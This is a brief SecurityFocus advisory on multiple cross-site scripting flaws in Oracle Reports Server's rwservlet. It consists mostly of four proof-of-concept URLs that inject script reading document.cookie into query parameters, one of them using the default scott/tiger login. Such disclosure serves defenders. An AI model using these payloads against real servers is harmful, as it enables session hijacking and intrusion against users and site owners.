Oracle Reports Server Multiple Cross-Site Scripting Vulnerabilities

No exploit is required to leverage these issues. The following proof of concept examples are available:

http://www.example.com:7778/reports/rwservlet/showenv?server=reptest&debug=<script>aler
t(document.cookie);</script>

http://www.example.com:7778/reports/rwservlet/parsequery?server=myserver&test=<script>a
lert(document.cookie);</script>

http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=sc
ott/tiger@iasdb+destype=localFile+desformat=delimited+desname=FILE:+CELLWRAPPER=
*+delimiter=<script>alert(document.cookie);</script>

http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=sc
ott/tiger@iasdb+destype=localFile+desformat=delimited+desname=FILE:+CELLWRAPPER=
<script>alert(document.cookie);</script>


 

Privacy Statement
Copyright 2010, SecurityFocus